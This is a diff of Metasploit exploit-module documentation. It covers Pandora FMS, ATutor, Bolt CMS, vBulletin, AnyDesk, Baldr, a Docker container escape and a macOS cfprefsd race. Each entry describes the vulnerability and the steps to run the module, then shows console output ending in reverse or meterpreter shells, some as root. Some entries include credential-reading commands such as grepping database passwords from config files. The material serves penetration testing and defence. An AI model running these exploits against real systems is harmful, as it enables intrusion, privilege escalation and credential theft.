+[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+
+meterpreter > getuid
+Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.16.191.123
+OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -121,6 +121,8 @@ Exploit target:

 msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set password admin
+password => admin
 msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3
 lhost => 192.168.1.3
 msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
@@ -0,0 +1,115 @@
+## Vulnerable Application
+This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744
+(and perhaps older versions) in order to execute arbitrary commands.
+
+The module first connects to the target's `index.php` page in order to verify the version number, which should be displayed here.
+If the version indicates the target is likely vulnerable, the module will try to authenticate using the credentials provided by the user.
+If no custom credentials are provided, the module will use the default Pandora FMS credentials, which are `admin:pandora`.
+
+After authenticating, the module attempts to exploit CVE-2020-13851, which is a command injection vulnerability
+in the `Events` feature of Pandora FMS. Specifically, this flaw allows users to execute arbitrary commands via
+the `target` parameter in HTTP POST requests to the `Events` function.
+In order to obtain remote code execution, the module will attempt to issue a malicious HTTP POST request to the `Events` function,
+with the `target` parameter set to contain the payload.
+
+If a shell is obtained, the module will try to obtain the local MySQL database password via a simple `grep` command on the plaintext
+`/var/www/html/pandora_console/include/config.php` file.
+The default MySQL administrative user is `root` and the default password for the official CentOS virtual appliance ISO is `pandora`.
+For the official Docker container, the default MySQL password is `avwwoyqk`. This password can subsequently be used
+in order to query the database and to escalate the privilege of any Pandora FMS account to an administrator.
+
+Valid credentials for a Pandora FMS account are required for the module to work. The account does not need to have admin privileges.
+This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).
+
+Vulnerable software for testing can be download here: https://sourceforge.net/projects/pandora/.
+The easiest ways to install Pandora FMS are as a Docker image or as an ISO. Detailed instructions are available here:
+https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing.
+The ISO installation instructions are under sections 1.8 and 1.9, those for Docker are under 1.10.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/pandora_fms_events_exec`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the Pandora FMS account]`
+6. Do: `set PASSWORD [password for the Pandora FMS account]`
+7. Do: `set LHOST [IP]`
+8. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the Pandora FMS account to authenticate with. This option is required. The default value is `pandora`.
+
+### TARGETURI
+The base path to Pandora FMS. The default value is `/pandora_console/`.
+
+### USERNAME
+The username for the Pandora FMS account to authenticate with. This option is required. The default value is `admin`.
+
+## Scenarios
+### Pandora FMS 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). Target: Linux (x64)
+```
+msf5 exploit(linux/http/pandora_fms_events_exec) > show options
+
+Module options (exploit/linux/http/pandora_fms_events_exec):
+
+   Name       Current Setting    Required  Description
+   ----       ---------------    --------  -----------
+   PASSWORD   pandora            yes       Password to authenticate with
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.13       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80                 yes       The target port (TCP)
+   SRVHOST    0.0.0.0            yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080               yes       The local port to listen on.
+   SSL        false              no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pandora_console/  yes       Base path to Pandora FMS
+   URIPATH                       no        The URI to use for this exploit (default is random)
+   USERNAME   admin              yes       Username to authenticate with
+   VHOST                         no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux (x64)
+
+
+msf5 exploit(linux/http/pandora_fms_events_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[+] Authenticated as user admin.
+[*] Executing payload...
+[*] Sending stage (3012516 bytes) to 192.168.1.13
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Meterpreter session 18 opened (192.168.1.12:4444 -> 192.168.1.13:39208) at 2020-07-01 10:14:44 -0400
+
+meterpreter > 
+[*] Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.
+getuid
+Server username: no-user @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
+meterpreter >
+```
+### Pandora FMS 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). Target: Linux (cmd)
+```
+msf5 exploit(linux/http/pandora_fms_events_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[+] Authenticated as user admin.
+[*] Executing payload...
+[*] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.13:38776) at 2020-06-16 13:01:52 -0400
+[*] Trying to read the MySQL DB password via `cat include/config.php | grep dbpass`. The default privileged user is `root`.
+
+$config["dbpass"]="pandora";
+id
+uid=48(apache) gid=48(apache) groups=48(apache)
+```
@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+Docker Privileged Container Escape that obtains root on the host machine by abusing the Linux cgroup notification on rebase feature.
+
+Both meterpreter shell and classic shell are supported. The exploit will copy a payload to a writable directory in the container and then escape the container and either search for the payload on the file system or copy it directly from the container and then execute it on the host. 
+
+# Creating A Testing Environment
+
+- Install Docker
+- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host)
+```bash
+docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu
+```
+- Obtain a shell on the container with metasploit. One possible option is:
+```bash
+# Create a bind shell using msfvenom
+msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin
+# Copy bind shell into container
+docker cp ./bind4444.bin test-vuln-container:/bind4444.bin
+# Execute bind shell in the container
+docker exec -it test-vuln-container /bind4444.bin
+```
+- Connect to this bind shell in metasploit
+```bash
+use multi/handler
+set payload linux/x64/meterpreter/bind_tcp
+set rhost 127.0.0.1
+set lport 4444
+run
+```
+
+## Verification Steps
+
+1. `use exploit/linux/local/docker_privileged_container_escape`
+2. `set SESSION [session]`
+3. `set PAYLOAD [payload]`
+4. `set LHOST [lhost]`
+5. `set LPORT [lport]`
+6. `exploit`
+
+## Options
+
+## PAYLOAD
+
+Set this option to choose which type of root session you want to create.
+
+## ForceExploit
+
+Force exploit even if the current session does not appear to be in a docker container, or the container does not appear vulnerable.
+
+## ForcePayloadSearch
+
+Force the exploit to search for the payload in the file system rather than copying out of the docker container. This avoids the need for a writable directory on the host system. Typically, the filesystem of the container will be located in the `/var/lib/docker/overlay2/` directory.
+
+## WritableContainerDir
+
+A directory where we can write files inside the container (default is /tmp). This is needed to drop the payload into the container.
+
+## WritableHostDir
+
+A directory where we can write files on the host (default is /tmp). This is needed to copy the payload from the container onto the host. Alternatively see ForcePayloadSearch
+
+# Scenarios
+
+## Container Escape starting with a meterpreter shell
+
+```
+msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape
+msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1
+session => 1
+msf5 exploit(linux/local/lxc_privilege_escalation) > run
+
+[*] Started reverse TCP handler on 10.0.2.15:4444 
+[*] Writing payload executable to '/tmp/aLQdBKpMXLo'
+[*] Executing script to exploit privileged container
+[*] Sending stage (3012516 bytes) to 192.168.0.231
+[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100
+```
@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+This vulnerability affects Linux versions 5.5.2 and older. Old versions of AnyDesk can be downloaded from their site at
+https://download.anydesk.com/linux/. Use the `.deb` package for an Ubuntu installation.
+
+The `check` method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the
+target to respond with its own discovery frame. Each of these are sent from a random source port to the default AnyDesk
+discovery service port of 50001. To configure the listening service in Metasploit, change the `SRVHOST` and `SRVPORT`
+options. The exploit will use this method to detect the remote hostname and confirm that the operating system is Linux
+before proceeding.
+
+## Verification Steps
+
+1. Install the application
+1. Start the AnyDesk GUI. A window will open, leave it running.
+1. Start `msfconsole`
+1. Do: `use exploit/linux/misc/cve_2020_13160_anydesk`
+1. Set the module options
+1. Do: `exploit`
+1. You should get a shell.
+
+## Options
+
+### SRVHOST
+
+This option is used to specify the host on which to listen for discovery frames from AnyDesk.
+
+### SRVPORT
+
+This option is used to specify the port on which to listen for discovery frames from AnyDesk.
+
+## Scenarios
+
+### Ubuntu 18.04 x64
+
+```
+msf5 exploit(linux/misc/cve_2020_13160_anydesk) > use exploit/linux/misc/cve_2020_13160_anydesk 
+msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33
+RHOSTS => 192.168.159.33
+msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/misc/cve_2020_13160_anydesk) > check
+[*] 192.168.159.33:50001 - The service is running, but could not be validated. Remote hostname: ubuntu
+msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.87:4444 
+[*] Discovered the remote service (hostname: ubuntu, os: linux)
+[*] Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...
+[*] Sending stage (3012516 bytes) to 192.168.250.237
+[*] Meterpreter session 1 opened (192.168.250.87:4444 -> 192.168.250.237:51044) at 2020-06-17 10:21:44 -0400
+
+meterpreter > getuid
+Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
+meterpreter > sysinfo
+Computer     : 192.168.159.33
+OS           : Ubuntu 18.04 (Linux 5.3.0-59-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -2,7 +2,7 @@

 This module abuses a known default password in IBM Data Risk Manager. The 'a3user' has the default password 'idrm' and allows an attacker to log in to the virtual appliance via SSH.
 This can be escalated to full root access, as 'a3user' has `sudo` access with the default password.
-At the time of disclosure, this is a 0day. Versions <= 2.0.3 are confirmed to be affected, and the latest 2.0.6 is most likely affected too.
+At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM. Versions <= 2.0.6.1 are confirmed to be vulnerable.

 ### Vulnerability information
 For more information about the vulnerability, check the advisory at:
@@ -0,0 +1,135 @@
+## Vulnerable Application
+This module exploits an arbitrary file upload vulnerability together with a directory traversal
+flaw in ATutor versions 2.2.4, 2.2.2 and 2.2.1 in order to execute arbitrary commands.
+
+This module first authenticates to ATutor, using a randomly generated token to get around the front end JavaScript verification
+being used by the server. Next, the module generates a zip file containing a malicious PHP file.
+The zip archive takes advantage of a directory traversal vulnerability that will cause the target to drop the PHP file
+in the root server directory (`htdocs` for Windows and `html` for Linux targets) when unpacking the archive.
+For Windows targets, the module assumes that the target server uses XAMPP.
+However, users can override this default by setting a custom file traversal path.
+The PHP file contains an encoded payload that allows for remote command execution on the target server.
+The zip archive can be uploaded via two vectors, the `Import New Language` function and the `Patcher` function.
+The module first uploads the archive via `Import New Language` and then attempts to execute the payload
+via an HTTP GET request to the PHP file in the root server directory.
+If no session is obtained, the module creates another zip archive, uploads it via the `Patcher` function
+and then attempts to execute the payload the same way as before. If a session is obtained, the module automatically
+attempts to remove the malicious PHP file from the present working directory.
+
+The module is compatible with both Windows and Linux targets. Users can specify a target OS, or use the `Auto` target option.
+In the latter case, the module will try to detect the target OS based on the `Server` header set by the target
+in its response to an HTTP request.
+
+The module requires valid credentials for an ATutor account with admin privileges.
+It has been successfully tested against ATutor 2.2.4 running on a Windows 10 machine that used XAMPP.
+Vulnerable software can be downloaded here: https://sourceforge.net/projects/atutor/files/latest/download.
+ATutor is no longer being maintained and version 2.2.4 was the last release.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/atutor_upload_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the ATutor account]`
+6. Do: `set PASSWORD [password for the ATutor account]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Do: `exploit`
+
+## Targets
+
+```
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Auto
+   1   Linux
+   2   Windows
+
+```
+
+
+## Options
+### FILE_TRAVERSAL_PATH
+This is the traversal path to get from the upload path to the root server directory.
+It is used to make sure the malicious PHP is dropped in the root server directory when the zip being uploaded to the target
+is unpacked on the server side. The default value for Windows targets is `..\\..\\..\\..\\..\\../xampp\\htdocs\\`.
+This assumes the target uses XAMPP, as recommended in the ATutor documentation.
+The default value for Linux targets is `../../../../../../var/www/html/`.
+
+### PASSWORD
+The password for the ATutor account to authenticate with. This option is required.
+
+### TARGETURI
+The base path to ATutor. The default value is `/ATutor/`.
+
+### USERNAME
+The username for the ATutor account to authenticate with. This option is required.
+
+### WfsDelay
+The number of seconds to wait for a session to be created. This advanced option is used by the module to verify
+if exploitation via the `Import New Language` function succeeded. The default value is 3.
+
+## Scenarios
+### ATutor 2.2.4 running on Windows 10 (XAMPP)
+```
+msf5 exploit(multi/http/atutor_upload_traversal) > show options
+                                                                                                                  
+Module options (exploit/multi/http/atutor_upload_traversal):
+
+   Name                 Current Setting  Required  Description
+   ----                 ---------------  --------  -----------
+   FILE_TRAVERSAL_PATH                   no        Traversal path to the root server directory. Default for Windows targets: `..\..\..\..\..\../xampp\htdocs\`. Linux Default: `../../../../../../var/www/html/.`
+   PASSWORD             root             yes       Password to authenticate with
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS               192.168.1.12     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                80               yes       The target port (TCP)
+   SRVHOST              0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT              8080             yes       The local port to listen on.
+   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI            /ATutor/         yes       The base path to ATutor
+   URIPATH                               no        The URI to use for this exploit (default is random)
+   USERNAME             root             yes       Username to authenticate with
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.28     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf5 exploit(multi/http/atutor_upload_traversal) > run
+
+[*] Started reverse TCP handler on 192.168.1.28:4444 
+[+] Successfully authenticated as user 'root'. We have admin privileges!
+[+] Identified the target OS as Win64.
+[*] Setting payload to windows/x64/meterpreter/reverse_tcp.
+[*] Attempting exploitation via the `Import New Language` function.
+[*] Uploaded malicious PHP file vanwqiz.php.
+[*] Executing payload via /vanwqiz.php/qnwgdu?=<payload>...
+[*] Command Stager progress -  17.01% done (2046/12025 bytes)
+[*] Command Stager progress -  34.03% done (4092/12025 bytes)
+[*] Command Stager progress -  51.04% done (6138/12025 bytes)
+[*] Command Stager progress -  68.06% done (8184/12025 bytes)
+[*] Command Stager progress -  84.24% done (10130/12025 bytes)
+[*] Sending stage (201283 bytes) to 192.168.1.12
+[*] Meterpreter session 1 opened (192.168.1.28:4444 -> 192.168.1.12:49512) at 2020-06-12 13:50:47 -0400
+[*] Command Stager progress - 100.00% done (12025/12025 bytes)
+[+] Deleted vanwqiz.php
+
+meterpreter >
+
+```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an arbitrary file upload vulnerability within the Baldr
+stealer malware control panel when uploading victim log files (which are uploaded
+as ZIP files). Attackers can turn this vulnerability into an RCE by first
+registering a new bot to the panel and then uploading a ZIP file containing
+malicious PHP, which will then uploaded to a publicly accessible
+directory underneath the /logs web directory.
+
+Note that on versions 3.0 and 3.1 the ZIP files containing the victim log files
+are encoded by XORing them with a random 4 byte key. This exploit module gets around
+this restriction by retrieving the IP specific XOR key from panel gate before
+uploading the malicious ZIP file.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/baldr_upload_exec`
+  4. Do `set rhost 192.168.1.27`
+  5. Do: `run`
+  6. Verify that you get a shell on the target system
+
+
+## Options
+
+### TARGETURI
+The URI where the Baldr panel/gateway is located on the target web server.
+
+## Scenarios
+```
+msf5 > use exploit/multi/http/baldr_upload_exec 
+msf5 exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27
+rhost => 192.168.1.27
+msf5 exploit(multi/http/baldr_upload_exec) > run
+
+[*] Baldr Version: <= v2.0
+[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
+[+] Payload successfully triggered !
+[*] Started bind TCP handler against 192.168.1.27:9090
+[*] Sending stage (38288 bytes) to 192.168.1.27
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
+
+meterpreter > 
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+[vBulletin](https://www.vbulletin.com) A popular PHP bulletin board and blog web application.
+This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04.
+
+### Description
+
+This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module
+uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel'
+template while also providing the 'widget_php' argument which causes the former template to load the
+latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the
+exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution
+on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
+
+## Verification Steps
+
+1. Do: `use exploit/multi/http/vbulletin_widget_template_rce`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set VHOST [HOSTNAME]`
+4. Do: `set LHOST [IP]`
+5. Do: `set TARGETURI [PATH]`
+6. Do: `set PAYLOAD [PAYLOADNUM]`
+7. Do: `run`
+
+## Options
+
+### TARGETURI
+
+The base URI path of vBulletin. **Default: /**
+
+### PHP_CMD
+
+The PHP function to use to execute commands on the target. **Default: shell_exec**
+
+## Scenarios
+
+```
+msf6 > use exploit/multi/http/vbulletin_widget_template_rce
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
+VHOST => vb.local
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
+LHOST => 0.0.0.0
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
+TARGETURI => /
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > run
+
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Sending php/bind_perl command payload
+[*] Started bind TCP handler against 127.0.0.1:4444
+[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
@@ -5,8 +5,10 @@ The Windows dll files are provided by [@stamparm](https://github.com/stamparm) o
 located [here](https://github.com/rapid7/metasploit-framework/files/1879611/mysql_udf_libs.zip).  As noted
 in [#9677](https://github.com/rapid7/metasploit-framework/issues/9677#issuecomment-378893925) these are 'de-cloaked' versions,
 which may attract AV attention.
+
 The file is then loaded by mysql, and arbitrary commands can be run.  There are several caveats for this to
 function however, including:
+
 1. `secure_file_priv`, a mysql setting, must be changed from the default to allow writing
 to mysql's plugins folder
 2. on Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled.  Equivalents on other linux systems most likely need the same
@@ -23,11 +25,14 @@ In this configuration, we'll run mysql as root so we have a priv escalate.
 5. Restart mysql service: `sudo systemctl restart mysql.service`

 If you need to make the root user accessible remotely
+
 ```
 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
 FLUSH PRIVILEGES;
 ```
+
 or
+
 ```
 update user set host='%' where host='127.0.0.1';
 ```
@@ -42,11 +47,14 @@ One good reference for these instructions is [PR #5334](https://github.com/rapid
  4. Make the `C:\Program Files\MySQL\MySQL Server *\lib\plugin` folder permissions writable by the MySQL (service) user.

 If you need to make the root user accessible remotely
+
 ```
 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
 FLUSH PRIVILEGES;
 ```
+
 or
+
 ```
 update user set host='%' where host='127.0.0.1';
 ```
@@ -0,0 +1,70 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in
+order to run a payload as root. The CFPreferencesSetAppValue function, which is
+reachable from most unsandboxed processes, can be exploited with a race condition
+in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login
+a user can then login as root with the `login root` command without a password.
+
+
+## Verification Steps
+
+1. Get a session on a vulnerable system
+2. `use exploit/osx/local/cfprefsd_race_condition`
+3. `set lhost <IP>`
+4. `set lport <PORT>`
+5. `set session <session_id>`
+6. `run`
+
+## Scenarios
+
+### macOS Catalina 10.15.4
+
+```
+msf6 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information                                                                       Connection
+  --  ----  ----                 -----------                                                                       ----------
+  1         meterpreter x64/osx  user @ Users-Macbook-Pro.local (uid=501, gid=20, euid=501, egid=20) @ Users-M...  192.168.56.1:4444 -> 192.168.56.4:49451 (192.168.56.4)
+
+msf6 exploit(multi/handler) > use exploit/osx/local/cfprefsd_race_condition
+[*] Using configured payload osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/local/cfprefsd_race_condition) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf6 exploit(osx/local/cfprefsd_race_condition) > set LPORT 5555
+LPORT => 5555
+msf6 exploit(osx/local/cfprefsd_race_condition) > set SESSION 1
+SESSION => 1
+msf6 exploit(osx/local/cfprefsd_race_condition) > exploit
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.56.1:5555
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Writing '/tmp/.Ug0wUz4HX6' (17204 bytes) ...
+[*] Writing '/tmp/.qZy9vVNU' (14748 bytes) ...
+[*] Executing exploit '/tmp/.qZy9vVNU /etc/pam.d/login'
+[*] Exploit result:
+Trying 10000 calls...
+access: Permission denied
+pwned! /etc/pam.d/login is now writable!
+[*] Running cmd:
+echo '/tmp/.Ug0wUz4HX6 & disown' | login root
+[*] Transmitting first stager...(210 bytes)
+[*] Command output:
+Last login: Tue Aug 18 09:56:20 on tty??
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (799916 bytes) to 192.168.56.4
+[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.4:49452) at 2020-09-04 17:36:45 +0800
+
+meterpreter >
+[+] /etc/pam.d/login was restored
+
+meterpreter > getuid
+Server username: root @ Users-Macbook-Pro.local (uid=0, gid=0, euid=0, egid=0)
+
+```
+
@@ -0,0 +1,181 @@
+## Vulnerable Application
+
+This module exploits multiple vulnerabilities in Bolt CMS version 3.7.0 and 3.6.* in order to execute arbitrary commands as the user running Bolt.
+
+This module first authenticates to Bolt CMS and visits the profile page to obtain a special token.
+This token is then used to change the username in /bolt/profile to a PHP `system($_GET[""])` variable, using a generated random name.
+If this succeeds, the target may be vulnerable.
+The module then proceeds by issuing an HTTP GET request for /bolt/overview/showcases in order to obtain a CSRF token to be used later.
+
+Next, the module obtains a list of filename tokens from `/async/browse/cache/.sessions.`
+These tokens are used to create files with the blacklisted `.php` extention via HTTP POST requests to `/async/folder/rename`.
+With the CSRF token obtained before, it is possible to create .php files by "renaming" these cache tokens.
+While most (if not all) available tokens can be used to created .php files in the /root directory on the server,
+the resulting files cannot always be used to execute commands.
+The module excludes tokens with a filesize of under 2000 bytes, as they can't ever be used for this purpose. For the remaining tokens,
+it seems the easiest way to identify a valid one is to use each token to create a .php file
+and then check the contents of that file.
+The module does exactly this, deleting any .php files that can't be used
+until it finds a file for which the "displayname" value is an empty string ("").
+This value indicates that the profile username matching this token is the `$_GET` variable generated earlier,
+and that the file can be used to execute arbitrary commands.
+If a valid .php file is created, the module executes the payload via an HTTP get request in this format:
+`/files/<rogue_PHP_file>?<$_GET_variable>=<payload>`
+
+The module requires valid credentials for a Bolt CMS user. This module has been successfully tested on Bolt CMS 3.7.0.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/unix/webapp/bolt_authenticated_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the Bolt CMS account]`
+6. Do: `set PASSWORD [password for the Bolt CMS account]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Do: `exploit`
+
+## Options
+
+### FILE_TRAVERSAL_PATH
+
+This is the traversal path to get from the `/files/` directory on the web server to the `/root` directory on the server.
+It is used by the module to write rogue .php files to /root. The default value is `../../../public/files`.
+
+### PASSWORD
+
+The password for the Bolt CMS account to authenticate with. This option is required.
+
+### TARGETURI
+
+The base path to Bolt CMS. The default value is `/`.
+
+### USERNAME
+
+The username for the Bolt CMS account to authenticate with. This option is required.
+
+## Scenarios
+
+### Bolt CMS 3.7.0 running on CentOS 7
+
+```
+msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options
+
+Module options (exploit/unix/webapp/bolt_authenticated_rce):
+
+   Name                 Current Setting        Required  Description
+   ----                 ---------------        --------  -----------
+   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Path from the "files" directory to the root folder
+   PASSWORD             boltbolt               yes       Password to authenticate with
+   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS               192.168.1.4            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                8000                   yes       The target port (TCP)
+   SRVHOST              0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT              8080                   yes       The local port to listen on.
+   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI            /                      yes       Base path to Bolt CMS
+   URIPATH                                     no        The URI to use for this exploit (default is random)
+   USERNAME             bolt                   yes       Username to authenticate with
+   VHOST                                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.10   yes       The listen address (an interface may be specified)
+   LPORT  4444           yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Linux (cmd)
+
+
+msf5 exploit(unix/webapp/bolt_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.10:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "nbxnh".
+[*] Found 6 potential token(s) for creating .php files.
+[+] Used token a0293d73f435515024c2c5d37a to create phfsbswowfp.php.
+[*] Attempting to execute the payload via "/files/phfsbswowfp.php?nbxnh=`payload`"
+[+] Payload executed!
+[+] Deleted file phfsbswowfp.php.
+[+] Reverted user profile back to original state.
+[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.4:52008) at 2020-05-26 09:15:19 -0400
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+```
+
+### Bolt CMS 3.7.0 running on Ubuntu 18.04
+
+```
+msf5 exploit(unix/webapp/bolt_authenticated_rce) > options
+
+Module options (exploit/unix/webapp/bolt_authenticated_rce):
+
+   Name                 Current Setting        Required  Description
+   ----                 ---------------        --------  -----------
+   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
+   PASSWORD             boltbolt               yes       Password to authenticate with
+   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS               172.28.128.5           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                8000                   yes       The target port (TCP)
+   SRVHOST              0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT              8080                   yes       The local port to listen on.
+   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI            /                      yes       Base path to Bolt CMS
+   URIPATH                                     no        The URI to use for this exploit (default is random)
+   USERNAME             bolt                   yes       Username to authenticate with
